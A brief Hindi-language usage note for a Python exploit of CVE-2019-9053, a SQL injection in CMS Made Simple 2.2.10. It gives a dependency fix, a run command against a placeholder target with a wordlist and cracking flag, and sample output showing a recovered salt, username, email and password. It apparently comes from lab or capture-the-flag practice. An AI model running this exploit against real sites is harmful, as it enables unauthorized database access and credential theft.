
CMS Made Simple 2.2.10 में CVE-2019-9053 SQL इंजेक्शन के लिए पायथन एक्सप्लॉइट, जिसमें पासवर्ड हैश क्रैकिंग और यूज़र एन्यूमरेशन क्षमताएँ शामिल हैं।
exploit को Python 3 का समर्थन करने के लिए ठीक किया गया था।
Traceback (most recent call last): File "46635.py", line 12, in from termcolor import colored ImportError: No module named termcolor
pip install termcolor
python cve.py -u http://target --crack -w /usr/share/wordlists/best110.txt
[+] Salt for password found: 18
[+] Username found: mitw
[+] Email found: adk
[+] Password found: 0c01f4468d